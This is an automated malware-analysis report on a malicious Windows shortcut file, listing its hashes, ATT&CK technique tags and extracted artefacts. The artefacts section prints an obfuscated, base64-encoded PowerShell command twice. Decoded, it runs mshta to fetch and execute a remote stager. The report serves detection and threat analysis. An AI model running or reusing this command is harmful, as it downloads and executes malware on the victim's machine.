Malicious

b5fbcce121ee4e0b0a9825875b4cedbf

LNK File | MD5: b5fbcce121ee4e0b0a9825875b4cedbf | Size: 2.75 KB | application/x-ms-shortcut

LNK | Malicious | LOLBin | LOLBin:powershell.exe | Execution: CMD in LNK | T1059.003 | T1202: Indirect Command Execution | T1204.002 | Execution: PowerShell in LNK | T1059.001 | PowerShell | Batch Command | PowerShell Call | DeObfuscated

Characteristics
Hash | Hash Value
MD5 | b5fbcce121ee4e0b0a9825875b4cedbf
Sha1 | cb82ae80067702e47b5a3a858ba1ae6d164138a3
Sha256 | 79d3b29e267a7a41068c7ebea0bd4cfe9e16dc0cc03a034c8fadbc4426bfbbf7
Sha384 | 6eb1645df5ad32f2d20a41429f06c1f684f02c95af74e2a356b7759822979f367b4599d71708c2438d50c5e0ba8c4a1e
Sha512 | c27cac3444345c3f71828a3751becdfc08e255bb116a0a371ce2028d72eda301187057bb4aca3fe0c63f887d4fda2ed57b82de48a9b233b4543ff39b10f65e6c
SSDeep | 24:8Ayw/BHYVKVWO+/CWuO9xkz4Xxa5gmYXsrsysh6FtmVdd79dsHqThOr:8y5aS6kUXSgmYcQVh6FtmVdJ91Ir
TLSH | 9A51F2280AF101EAF673D7B99BF573B24966F7968D259ABC008063414722510B863E3A
File Structure
b5fbcce121ee4e0b0a9825875b4cedbf | LNK | Malicious | LOLBin | LOLBin:powershell.exe | Execution: CMD in LNK | T1059.003 | T1202: Indirect Command Execution | T1204.002 | Execution: PowerShell in LNK | T1059.001 | PowerShell | Batch Command | PowerShell Call | DeObfuscated
Malicious | LNK CommandLine | PowerShell | Batch Command | PowerShell Call | Contains Base64 Block | Base64 Block | DeObfuscated
Malicious | [PowerShell Command] | PowerShell | DeObfuscated | Contains Base64 Block | Base64 Block
Malicious | [Deobfuscated PS] | DeObfuscated | PowerShell
Malicious | [Base64-Block] | Base64 Block
[Lnk Summary] | Malicious
Artefacts
Name | Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBeAF4AXgBeAHMAXgBeAF4AXgBoAF4AXgBeAHQAXgBeAF4AXgBhACAAXgBeAF4AXgBoAHQAXgB0AHAAcwBeAF4AXgBeADoALwBeAF4AXgBeAC8AcwBrAF4AXgBeAF4AaQBeAF4AXgBuAHMAbwBeAG4AcwBrAGkAbgBeAF4AXgBeAHMAbQBhAHIAawBlAF4AXgBeAHQAXgBeAF4AXgAuAGkAbgBeAF4AXgBeAGYAbwBeAF4AXgAvAGEAcABwAF4AXgBeAF4ALwBzAHQAXgBeAF4AYQBeAF4AZwBeAGUAcgBeAF4AXgAuAF4AXgBeAF4AbQBwAF4AXgBeADQAXgBeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA==

Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBeAF4AXgBeAHMAXgBeAF4AXgBoAF4AXgBeAHQAXgBeAF4AXgBhACAAXgBeAF4AXgBoAHQAXgB0AHAAcwBeAF4AXgBeADoALwBeAF4AXgBeAC8AcwBrAF4AXgBeAF4AaQBeAF4AXgBuAHMAbwBeAG4AcwBrAGkAbgBeAF4AXgBeAHMAbQBhAHIAawBlAF4AXgBeAHQAXgBeAF4AXgAuAGkAbgBeAF4AXgBeAGYAbwBeAF4AXgAvAGEAcABwAF4AXgBeAF4ALwBzAHQAXgBeAF4AYQBeAF4AZwBeAGUAcgBeAF4AXgAuAF4AXgBeAF4AbQBwAF4AXgBeADQAXgBeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA=="
